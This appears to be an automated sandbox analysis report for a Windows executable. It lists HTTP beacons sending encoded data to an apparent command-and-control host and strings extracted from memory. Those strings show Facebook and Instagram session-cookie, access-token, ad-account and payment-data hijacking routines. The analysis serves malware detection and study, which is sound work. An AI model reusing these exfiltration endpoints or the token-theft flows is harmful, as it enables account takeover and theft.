Source: global traffic	HTTP traffic detected: POST /info_old/w HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: application/x-www-form-urlencodedAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36upgrade-insecure-requests: 1Content-Length: 81Host: 84cfba021a5a6662.xyzData Raw: 69 6e 66 6f 3d 57 79 53 41 6e 62 58 6a 57 54 56 55 2d 51 62 38 74 50 46 55 69 49 63 37 71 61 73 54 53 41 70 4b 38 35 4b 2d 4a 71 42 34 57 79 32 77 30 67 6f 35 4c 5a 74 58 56 65 4c 39 39 71 72 45 30 32 4f 31 47 46 52 6a 30 50 36 5f 47 36 63 7e Data Ascii: info=WySAnbXjWTVU-Qb8tPFUiIc7qasTSApK85K-JqB4Wy2w0go5LZtXVeL99qrE02O1GFRj0P6_G6c~
Source: global traffic	HTTP traffic detected: POST /info_old/w HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: application/x-www-form-urlencodedAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36upgrade-insecure-requests: 1Content-Length: 81Host: 84cfba021a5a6662.xyzData Raw: 69 6e 66 6f 3d 57 79 53 41 6e 62 58 6a 57 54 56 55 2d 51 62 38 74 50 46 55 69 49 63 37 71 61 73 54 53 41 70 4b 38 35 4b 2d 4a 71 42 34 57 79 32 77 30 67 6f 35 4c 5a 74 58 56 65 4c 39 39 71 72 45 30 32 4f 31 47 46 52 6a 30 50 36 5f 47 36 63 7e Data Ascii: info=WySAnbXjWTVU-Qb8tPFUiIc7qasTSApK85K-JqB4Wy2w0go5LZtXVeL99qrE02O1GFRj0P6_G6c~
Source: global traffic	HTTP traffic detected: POST /info_old/w HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: application/x-www-form-urlencodedAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36upgrade-insecure-requests: 1Content-Length: 81Host: 84cfba021a5a6662.xyzData Raw: 69 6e 66 6f 3d 57 79 53 41 6e 62 58 6a 57 54 56 55 2d 51 62 38 74 50 46 55 69 49 63 37 71 61 73 54 53 41 70 4b 38 35 4b 2d 4a 71 42 34 57 79 32 77 30 67 6f 35 4c 5a 74 58 56 65 4c 39 39 71 72 45 30 32 4f 31 47 46 52 6a 30 50 36 5f 47 36 63 7e Data Ascii: info=WySAnbXjWTVU-Qb8tPFUiIc7qasTSApK85K-JqB4Wy2w0go5LZtXVeL99qrE02O1GFRj0P6_G6c~
Source: global traffic	HTTP traffic detected: POST /info_old/w HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: application/x-www-form-urlencodedAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36upgrade-insecure-requests: 1Content-Length: 81Host: 84cfba021a5a6662.xyData Raw: Data Ascii:

Source: C:\Users\user\Desktop\N1yprTBBXs.exe

Code function: 0_2_00454060 WaitForSingleObject,HttpOpenRequestW,HttpSendRequestW,HttpQueryInfoW,InternetReadFile,_memmove,InternetCloseHandle,InternetCloseHandle,

Source: global traffic	HTTP traffic detected: GET /info_old/r HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36upgrade-insecure-requests: 1Host: 84cfba021a5a6662.xyz
Source: global traffic	HTTP traffic detected: GET /info_old/ddd HTTP/1.1Host: 84CFBA021A5A6662.xyzAccept: /

Source: 6272167835D47591.exe, 00000004.00000002.280686595.00000000034AC000.00000004.00000001.sdmp	String found in binary or memory: "name":"fb_dtsg","value":"name="fb_dtsg" value="Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: nonehttps://www.facebook.com/""2%d0https://graph.facebook.com/me/friends?access_token=%s&pretty=1&limit=1summarytotal_count{}summarytotal_count%dquery_friends.\task_cookie\facebook_agreement.cpp[HIJACK][%s][%s][%d]: count = %d equals www.facebook.com (Facebook)
Source: 6272167835D47591.exe, 00000002.00000002.353440614.000000000351C000.00000004.00000001.sdmp, 6272167835D47591.exe, 00000004.00000002.280686595.00000000034AC000.00000004.00000001.sdmp	String found in binary or memory: -3https://www.facebook.com/payments/settings/payment_methods/index.php?__a=1errorSummaryconfirmemail.phpcard_type_name-110query_payment2.\task_cookie\facebook_agreement.cpp[HIJACK][%s][%s][%d]: ret = %s equals www.facebook.com (Facebook)
Source: 6272167835D47591.exe	String found in binary or memory: _time":"13245950599128816","lastpingday":"13245947458518717","location":1,"manifest":{"app":{"launch":{"container":"tab","web_url":"http://www.youtube.com"},"web_content":{"enabled":true,"origin":"http://www.youtube.com"}},"current_locale":"en","default_locale equals www.youtube.com (Youtube)
Source: 6272167835D47591.exe, 00000004.00000002.280686595.00000000034AC000.00000004.00000001.sdmp	String found in binary or memory: accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9sec-fetch-dest: documentsec-fetch-mode: navigatesec-fetch-site: same-originreferer: https://www.messenger.com/origin: https://www.messenger.comhttps://www.messenger.com/login/nonce/ookie: c_user=ookie: xs=ookie: ;%[^;]; https://m.facebook.com/settings/email/<span class="_52ji _8uk3">accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9sec-fetch-dest: documentsec-fetch-mode: navigatesec-fetch-site: noneupgrade-insecure-requests: 1</span></span>@@@@https://m.facebook.com/settings/sms/<strong><span dir="ltr">accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9sec-fetch-dest: documentsec-fetch-mode: navigatesec-fetch-site: noneupgrade-insecure-requests: 1</span></span>+ https://m.facebook.com/pages/creation_flow/?step=name&cat_ref_page_id=0&ref_type=launch_point"dtsg":{"token":"accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9sec-fetch-dest: documentsec-fetch-mode: navigatesec-fetch-site: noneupgrade-insecure-requests: 1"https://m.facebook.com/pages/create/edit_name/"draftID":Accept: /Origin: https://m.facebook.comReferer: https://m.facebook.com/pages/creation_flow/?step=name&cat_ref_page_id=0&ref_type=launch_pointSec-Fetch-Dest: emptySec-Fetch-Mode: corsSec-Fetch-Site: same-originX-Requested-With: XMLHttpRequestX-Response-Format: JSONStreampage_name=&m_sess=&fb_dtsg=&jazoest=&__csr=&__req=3&__user=,"https://m.facebook.com/pages/creation_flow/?step=category&draft_id=&cat_ref_page_id=0&extra_data=%7B%22page_name%22%3A%22%22%7D"dtsg":{"token":"accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9Referer: https://m.facebook.com/pages/creation_flow/?step=name&cat_ref_page_id=0&ref_type=launch_pointsec-fetch-dest: documentsec-fetch-mode: navigatesec-fetch-site: same-originSec-Fetch-User: ?1upgrade-insecure-requests: 1"https://m.facebook.com/pages/create/edit_category/"pageID":Referer: https://m.facebook.com/pages/creation_flow/?step=category&draft_id=&cat_ref_page_id=0&extra_data=%7B%22page_name%22%3A%22%22%7DAccept: /Origin: https://m.facebook.comSec-Fetch-Dest: emptySec-Fetch-Mode: corsSec-Fetch-Site: same-originX-Response-Format: JSONStreamX-Requested-With: XMLHttpRequestpage_category=1300&draft_id=&m_sess=&fb_dtsg=&jazoest=&__csr=&__req=9&__user=}"+ .-_@@friends2page.\task_cookie\facebook_agreement.cpp[HIJACK][%s][%s][%d]: pageid = %s equals www.facebook.com (Facebook)
Source: 6272167835D47591.exe, 00000004.00000002.280686595.00000000034AC000.00000004.00000001.sdmp	String found in binary or memory: bad allocationSOFTWARE\Mozilla\Mozilla FirefoxCurrentVersion\\MainInstall Directory%s\firefox.exe{}[]"1""2""3"123bad allocationc_user=xs=https://www.facebook.com/adsmanager/manage/adshttps://business.facebook.com/adsmanager/manage/adssettings/?act=&access_token:""access_token":""query_token_account_id.\task_cookie\facebook_agreement.cpp[HIJACK][%s][%s][%d]: account_id = %s token =%s equals www.facebook.com (Facebook)
Source: 6272167835D47591.exe, 00000002.00000002.353440614.000000000351C000.00000004.00000001.sdmp, 6272167835D47591.exe, 00000004.00000002.280686595.00000000034AC000.00000004.00000001.sdmp	String found in binary or memory: c_user=xs=https://www.facebook.com/ads/manager/account_settingsaccountID:"access_token:"Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: none""query_token_account_id_laomaozi.\task_cookie\facebook_agreement.cpp[HIJACK][%s][%s][%d]: account_id = %s token =%s equals www.facebook.com (Facebook)
Source: 6272167835D47591.exe, 00000004.00000002.280686595.00000000034AC000.00000004.00000001.sdmp	String found in binary or memory: c_user=xs=https://www.facebook.com/adsmanager/manage/adshttps://business.facebook.com/adsmanager/manage/adswindow.location.replace("")/act___accessToken="Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: nonehttps:act=/\/"%[0-9]query_token_account_id2.\task_cookie\facebook_agreement.cpp[HIJACK][%s][%s][%d]: account_id = %s token =%s equals www.facebook.com (Facebook)
Source: 6272167835D47591.exe	String found in binary or memory: http://www.youtube.com equals www.youtube.com (Youtube)
Source: 6272167835D47591.exe, 00000002.00000002.353440614.000000000351C000.00000004.00000001.sdmp, 6272167835D47591.exe, 00000004.00000002.280686595.00000000034AC000.00000004.00000001.sdmp	String found in binary or memory: https://www.facebook.com/ equals www.facebook.com (Facebook)
Source: 6272167835D47591.exe, 00000004.00000002.280686595.00000000034AC000.00000004.00000001.sdmp	String found in binary or memory: https://www.facebook.com/"name="fb_dtsg" value=""logout_hash":"""logout_hash":"logoutToken:""logoutToken:"https://www.facebook.com/comet/try/source=SETTINGS_MENU&nctr[_mod]=pagelet_bluebar&__user=&__a=1&__csr=&__req=14&__beoa=0&__pc=PHASED%3ADEFAULT&dpr=1&__ccg=EXCELLENT&fb_dtsg=&jazoest=for (;;);{https://m.facebook.com/logout.php?h=%s&t=%sc_user=deleted"encrypted":"https://m.facebook.com/?_rdr""name="fb_dtsg" value="logout.phpm_sess=&fb_dtsg=&jazoest=&__csr=&__req=9&__a=&__user=https://m.facebook.com/bookmarks/flyout/body/?id=u_0_6\https://m.facebook.com/logout.php%sc_user=deletedhttps://m.facebook.com/?soft=bookmarks"logoutURL":"\"logout.phphttps://m.facebook.com&source=mtouch_logout_button&persist_locale=1&button_name=logout&button_location=settings%s equals www.facebook.com (Facebook)
Source: 6272167835D47591.exe, 00000002.00000002.353440614.000000000351C000.00000004.00000001.sdmp, 6272167835D47591.exe, 00000004.00000002.280686595.00000000034AC000.00000004.00000001.sdmp	String found in binary or memory: https://www.facebook.com/ads/manager/account_settings equals www.facebook.com (Facebook)
Source: 6272167835D47591.exe, 00000002.00000002.353440614.000000000351C000.00000004.00000001.sdmp, 6272167835D47591.exe, 00000004.00000002.280686595.00000000034AC000.00000004.00000001.sdmp	String found in binary or memory: https://www.facebook.com/adsmanager/manage/ads equals www.facebook.com (Facebook)
Source: 6272167835D47591.exe, 00000002.00000002.353440614.000000000351C000.00000004.00000001.sdmp, 6272167835D47591.exe, 00000004.00000002.280686595.00000000034AC000.00000004.00000001.sdmp	String found in binary or memory: https://www.facebook.com/bookmarks/pages?ref_type=logout_gear equals www.facebook.com (Facebook)
Source: 6272167835D47591.exe, 00000002.00000002.353440614.000000000351C000.00000004.00000001.sdmp, 6272167835D47591.exe, 00000004.00000002.280686595.00000000034AC000.00000004.00000001.sdmp	String found in binary or memory: https://www.facebook.com/comet/try/ equals www.facebook.com (Facebook)
Source: 6272167835D47591.exe, 00000004.00000002.280686595.00000000034AC000.00000004.00000001.sdmp	String found in binary or memory: https://www.facebook.com/connect/ping?client_id=124024574287414&domain=www.instagram.com&origin=1&redirect_uri=https%3A%2F%2Fstaticxx.facebook.com%2Fconnect%2Fxd_arbiter%2Fr%2F1e2RywyANNe.js%3Fversion%3D42%23cb%3Df19f2d8a0dd2f24%26domain%3Dwww.instagram.com%26origin%3Dhttps%253A%252F%252Fwww.instagram.com%252Ff2dc055ae1b1274%26relation%3Dparent&response_type=token%2Csigned_request%2Ccode&sdk=joey&version=v2.2 equals www.facebook.com (Facebook)
Source: 6272167835D47591.exe, 00000004.00000002.280686595.00000000034AC000.00000004.00000001.sdmp	String found in binary or memory: https://www.facebook.com/connect/ping?client_id=124024574287414&domain=www.instagram.com&origin=1&redirect_uri=https%3A%2F%2Fstaticxx.facebook.com%2Fconnect%2Fxd_arbiter%2Fr%2F1e2RywyANNe.js%3Fversion%3D42%23cb%3Df19f2d8a0dd2f24%26domain%3Dwww.instagram.com%26origin%3Dhttps%253A%252F%252Fwww.instagram.com%252Ff2dc055ae1b1274%26relation%3Dparent&response_type=token%2Csigned_request%2Ccode&sdk=joey&version=v2.2&access_token=&expires_in=Location: query_instagram_cookie.\task_cookie\facebook_agreement.cpp[HIJACK][%s][%s][%d]: token = %s equals www.facebook.com (Facebook)
Source: 6272167835D47591.exe, 00000002.00000002.353440614.000000000351C000.00000004.00000001.sdmp, 6272167835D47591.exe, 00000004.00000002.280686595.00000000034AC000.00000004.00000001.sdmp	String found in binary or memory: https://www.facebook.com/dialog/oauth?client_id=124024574287414&redirect_uri=https%3A%2F%2Fwww.instagram.com%2Faccounts%2Fsignup%2F&state=%7B%22fbLoginKey%22%3A%221l3a6gcoxzmx9bogry41n78unr193ooptzd1bmk8ggfxw5bdph1%22%2C%22fbLoginReturnURL%22%3A%22%2F%22%7D&scope=email&response_type=code%2Cgranted_scopes equals www.facebook.com (Facebook)
Source: 6272167835D47591.exe, 00000002.00000002.353440614.000000000351C000.00000004.00000001.sdmp, 6272167835D47591.exe, 00000004.00000002.280686595.00000000034AC000.00000004.00000001.sdmp	String found in binary or memory: https://www.facebook.com/dialog/oauth?client_id=124024574287414&redirect_uri=https%3A%2F%2Fwww.instagram.com%2Faccounts%2Fsignup%2F&state=%7B%22fbLoginKey%22%3A%221l3a6gcoxzmx9bogry41n78unr193ooptzd1bmk8ggfxw5bdph1%22%2C%22fbLoginReturnURL%22%3A%22%2F%22%7D&scope=email&response_type=code%2Cgranted_scopesLocation: equals www.facebook.com (Facebook)
Source: 6272167835D47591.exe, 00000002.00000002.353440614.000000000351C000.00000004.00000001.sdmp, 6272167835D47591.exe, 00000004.00000002.280686595.00000000034AC000.00000004.00000001.sdmp	String found in binary or memory: https://www.facebook.com/dialog/oauth?client_id=124024574287414&redirect_uri=https%3A%2F%2Fwww.instagram.com%2Faccounts%2Fsignup%2F&state=%7B%22fbLoginKey%22%3A%221l3a6gcoxzmx9bogry41n78unr193ooptzd1bmk8ggfxw5bdph1%22%2C%22fbLoginReturnURL%22%3A%22%2F%22%7D&scope=email&response_type=code%2Cgranted_scopesocation: equals www.facebook.com (Facebook)
Source: 6272167835D47591.exe, 00000002.00000002.353440614.000000000351C000.00000004.00000001.sdmp, 6272167835D47591.exe, 00000004.00000002.280686595.00000000034AC000.00000004.00000001.sdmp	String found in binary or memory: https://www.facebook.com/login/async_sso/messenger_dot_com/?__a=1 equals www.facebook.com (Facebook)
Source: 6272167835D47591.exe, 00000002.00000002.353440614.000000000351C000.00000004.00000001.sdmp, 6272167835D47591.exe, 00000004.00000002.280686595.00000000034AC000.00000004.00000001.sdmp	String found in binary or memory: https://www.facebook.com/login/async_sso/messenger_dot_com/?__a=1x-auth-result: query_mess_cookie.\task_cookie\facebook_agreement.cpp[HIJACK][%s][%s][%d]: x_auth_result = %s equals www.facebook.com (Facebook)
Source: 6272167835D47591.exe, 00000002.00000002.353440614.000000000351C000.00000004.00000001.sdmp, 6272167835D47591.exe, 00000004.00000002.280686595.00000000034AC000.00000004.00000001.sdmp	String found in binary or memory: https://www.facebook.com/payments/settings/payment_methods/index.php?__a=1 equals www.facebook.com (Facebook)
Source: 6272167835D47591.exe, 00000002.00000002.353440614.000000000351C000.00000004.00000001.sdmp, 6272167835D47591.exe, 00000004.00000002.280686595.00000000034AC000.00000004.00000001.sdmp	String found in binary or memory: https://www.facebook.com/x/oauth/status?client_id=124024574287414&input_token&origin=1&redirect_uri= equals www.facebook.com (Facebook)
Source: 6272167835D47591.exe, 00000002.00000002.353440614.000000000351C000.00000004.00000001.sdmp, 6272167835D47591.exe, 00000004.00000002.280686595.00000000034AC000.00000004.00000001.sdmp	String found in binary or memory: https://www.facebook.com/x/oauth/status?client_id=124024574287414&input_token&origin=1&redirect_uri=origin: https://www.instagram.comsec-fetch-mode: corsreferer: https://www.instagram.com/sec-fetch-site: cross-sitefb-ar: equals www.facebook.com (Facebook)
Source: 6272167835D47591.exe, 00000002.00000002.353440614.000000000351C000.00000004.00000001.sdmp, 6272167835D47591.exe, 00000004.00000002.280686595.00000000034AC000.00000004.00000001.sdmp	String found in binary or memory: https://www.instagram.com/accounts/login/ajax/facebook/ equals www.facebook.com (Facebook)
Source: 6272167835D47591.exe, 00000002.00000002.353440614.000000000351C000.00000004.00000001.sdmp, 6272167835D47591.exe, 00000004.00000002.280686595.00000000034AC000.00000004.00000001.sdmp	String found in binary or memory: x-csrftoken: xhttps://www.instagram.com/accounts/login/ajax/facebook/"userId": "sessionid="";sessionid=;query_instagram_cookie.\task_cookie\facebook_agreement.cpp[HIJACK][%s][%s][%d]: sessionid = %s equals www.facebook.com (Facebook)
Source: 6272167835D47591.exe, 00000002.00000002.353440614.000000000351C000.00000004.00000001.sdmp, 6272167835D47591.exe, 00000004.00000002.280686595.00000000034AC000.00000004.00000001.sdmp	String found in binary or memory: x-csrftoken: xhttps://www.instagram.com/accounts/login/ajax/facebook/"userId": "sessionid="";sessionid=;query_instagram_cookie_20191224.\task_cookie\facebook_agreement.cpp[HIJACK][%s][%s][%d]: sessionid = %s equals www.facebook.com (Facebook)
Source: 6272167835D47591.exe, 00000002.00000002.353440614.000000000351C000.00000004.00000001.sdmp, 6272167835D47591.exe, 00000004.00000002.280686595.00000000034AC000.00000004.00000001.sdmp	String found in binary or memory: x-csrftoken: xhttps://www.instagram.com/accounts/login/ajax/facebook/"userId": "sessionid="";sessionid=;query_instagram_cookie_20200229.\task_cookie\facebook_agreement.cpp[HIJACK][%s][%s][%d]: sessionid = %s equals www.facebook.com (Facebook)

Source: unknown

DNS traffic detected: queries for: 84cfba021a5a6662.xyz

Source: unknown

HTTP traffic detected: POST //fine/send HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: application/x-www-form-urlencodedAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36upgrade-insecure-requests: 1Content-Length: 82Host: 84cfba021a5a6662.xyz

Source: 6272167835D47591.exe, 00000004.00000003.273221994.0000000004191000.00000004.00000001.sdmp	String found in binary or memory: http://84CFBA021A5A6662.xyz/
Source: 6272167835D47591.exe, 00000004.00000003.273221994.0000000004191000.00000004.00000001.sdmp	String found in binary or memory: http://84CFBA021A5A6662.xyz/#y
Source: 6272167835D47591.exe, 00000002.00000003.344625053.0000000000BA7000.00000004.00000040.sdmp	String found in binary or memory: http://84CFBA021A5A6662.xyz/info_old/ddd
Source: 6272167835D47591.exe, 00000002.00000003.344625053.0000000000BA7000.00000004.00000040.sdmp	String found in binary or memory: http://84CFBA021A5A6662.xyz/info_old/g
Source: 6272167835D47591.exe, 00000002.00000003.344625053.0000000000BA7000.00000004.00000040.sdmp	String found in binary or memory: http://84CFBA021A5A6662.xyz/info_old/w
Source: ecv37E8.tmp.9.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertECCSecureServerCA.crt0
Source: ecv37E8.tmp.9.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: 6272167835D47591.exe, 00000002.00000002.353440614.000000000351C000.00000004.00000001.sdmp, 6272167835D47591.exe, 00000004.00000002.280686595.00000000034AC000.00000004.00000001.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceCodeSigningCA-1.crt0
Source: 6272167835D47591.exe, 00000002.00000002.353440614.000000000351C000.00000004.00000001.sdmp, 6272167835D47591.exe, 00000004.00000002.280686595.00000000034AC000.00000004.00000001.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceEVRootCA.crt0
Source: ecv37E8.tmp.9.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2ExtendedValidationServerCA.crt0
Source: 6272167835D47591.exe, 00000002.00000002.353440614.000000000351C000.00000004.00000001.sdmp, 6272167835D47591.exe, 00000004.00000002.280686595.00000000034AC000.00000004.00000001.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2HighAssuranceCodeSigningCA.crt0
Source: ecv37E8.tmp.9.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2HighAssuranceServerCA.crt0
Source: ecv37E8.tmp.9.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2SecureServerCA.crt0
Source: ecv37E8.tmp.9.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertSecureSiteECCCA-1.crt0
Source: 6272167835D47591.exe, 6272167835D47591.exe, 00000004.00000003.272806364.000000000418E000.00000004.00000001.sdmp	String found in binary or memory: http://clients2.google.com/service/update2/crx
Source: ecv37E8.tmp.9.dr	String found in binary or memory: http://cookies.onetrust.mgr.consensu.org/?name=euconsent&value=&expire=0&isFirstRequest=true
Source: ecv37E8.tmp.9.dr	String found in binary or memory: http://cookies.onetrust.mgr.consensu.org/onetrust-logo.svg
Source: 1611970727133.exe.2.dr	String found in binary or memory: http://crl.comodoca.com/COMODOCodeSigningCA2.crl0r
Source: 1611970727133.exe.2.dr	String found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
Source: 1611970727133.exe.2.dr	String found in binary or memory: http://crl.comodoca.com/COMODORSACodeSigningCA.crl0t
Source: ecv37E8.tmp.9.dr	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: ecv37E8.tmp.9.dr	String found in binary or memory: http://crl.pki.goog/GTS1O1core.crl0
Source: ecv37E8.tmp.9.dr	String found in binary or memory: http://crl.pki.goog/GTSGIAG3.crl0
Source: ecv37E8.tmp.9.dr	String found in binary or memory: http://crl.pki.goog/gsr2/gsr2.crl0?
Source: N1yprTBBXs.exe	String found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
Source: ecv37E8.tmp.9.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: ecv37E8.tmp.9.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: ecv37E8.tmp.9.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: 6272167835D47591.exe, 00000002.00000002.353440614.000000000351C000.00000004.00000001.sdmp, 6272167835D47591.exe, 00000004.00000002.280686595.00000000034AC000.00000004.00000001.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
Source: 6272167835D47591.exe, 00000002.00000002.353440614.000000000351C000.00000004.00000001.sdmp, 6272167835D47591.exe, 00000004.00000002.280686595.00000000034AC000.00000004.00000001.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0O
Source: ecv37E8.tmp.9.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertSecureSiteECCCA-1.crl0
Source: ecv37E8.tmp.9.dr	String found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
Source: ecv37E8.tmp.9.dr	String found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0=
Source: 6272167835D47591.exe, 00000002.00000002.353440614.000000000351C000.00000004.00000001.sdmp, 6272167835D47591.exe, 00000004.00000002.280686595.00000000034AC000.00000004.00000001.sdmp	String found in binary or memory: http://crl3.digicert.com/ha-cs-2011a.crl0.
Source: ecv37E8.tmp.9.dr	String found in binary or memory: http://crl3.digicert.com/sha2-ev-server-g2.crl04
Source: 6272167835D47591.exe, 00000002.00000002.353440614.000000000351C000.00000004.00000001.sdmp, 6272167835D47591.exe, 00000004.00000002.280686595.00000000034AC000.00000004.00000001.sdmp	String found in binary or memory: http://crl3.digicert.com/sha2-ha-cs-g1.crl00
Source: ecv37E8.tmp.9.dr	String found in binary or memory: http://crl3.digicert.com/sha2-ha-server-g6.crl04
Source: ecv37E8.tmp.9.dr	String found in binary or memory: http://crl3.digicert.com/ssca-ecc-g1.crl0.
Source: ecv37E8.tmp.9.dr	String found in binary or memory: http://crl3.digicert.com/ssca-sha2-g6.crl0/
Source: ecv37E8.tmp.9.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl0=
Source: ecv37E8.tmp.9.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: 6272167835D47591.exe, 00000004.00000002.280686595.00000000034AC000.00000004.00000001.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
Source: ecv37E8.tmp.9.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl0=
Source: ecv37E8.tmp.9.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertSecureSiteECCCA-1.crl0L
Source: 6272167835D47591.exe, 00000002.00000002.353440614.000000000351C000.00000004.00000001.sdmp, 6272167835D47591.exe, 00000004.00000002.280686595.00000000034AC000.00000004.00000001.sdmp	String found in binary or memory: http://crl4.digicert.com/ha-cs-2011a.crl0L
Source: ecv37E8.tmp.9.dr	String found in binary or memory: http://crl4.digicert.com/sha2-ev-server-g2.crl0K
Source: 6272167835D47591.exe, 00000002.00000002.353440614.000000000351C000.00000004.00000001.sdmp, 6272167835D47591.exe, 00000004.00000002.280686595.00000000034AC000.00000004.00000001.sdmp	String found in binary or memory: http://crl4.digicert.com/sha2-ha-cs-g1.crl0L
Source: ecv37E8.tmp.9.dr	String found in binary or memory: http://crl4.digicert.com/sha2-ha-server-g6.crl0L
Source: ecv37E8.tmp.9.dr	String found in binary or memory: http://crl4.digicert.com/ssca-ecc-g1.crl0L
Source: ecv37E8.tmp.9.dr	String found in binary or memory: http://crl4.digicert.com/ssca-sha2-g6.crl0L
Source: 6272167835D47591.exe	String found in binary or memory: http://docs.google.com/
Source: 6272167835D47591.exe	String found in binary or memory: http://drive.google.com/
Source: 6272167835D47591.exe, 00000004.00000003.272806364.000000000418E000.00000004.00000001.sdmp	String found in binary or memory: http://drive.google.com/#y
Source: ecv37E8.tmp.9.dr	String found in binary or memory: http://images.outbrainimg.com/transform/v3/eyJpdSI6IiIsIml1ZSI6Imh0dHA6Ly9pbWFnZXMyLnplbWFudGEuY29tL
Source: ecv37E8.tmp.9.dr	String found in binary or memory: http://images.outbrainimg.com/transform/v3/eyJpdSI6IjE4MmE0M2M0MDY3OGU1N2E4MjhkM2NjNDdlNGMzZmNkYjU1N
Source: ecv37E8.tmp.9.dr	String found in binary or memory: http://images.outbrainimg.com/transform/v3/eyJpdSI6Ijc4NDFiMmZlNWMxZGU2M2JkNDdjMGQzZWI3NjIzYjlkNWU5N
Source: ecv37E8.tmp.9.dr	String found in binary or memory: http://images.outbrainimg.com/transform/v3/eyJpdSI6ImY3MDA1MDJkMTdmZDY0M2VkZTBjNzg5MTE1OWEyYTYxMWRiN
Source: ecv37E8.tmp.9.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA7XCQ3?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: ecv37E8.tmp.9.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AADuG4N?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jpg
Source: ecv37E8.tmp.9.dr	String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AADuQtg?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=jp
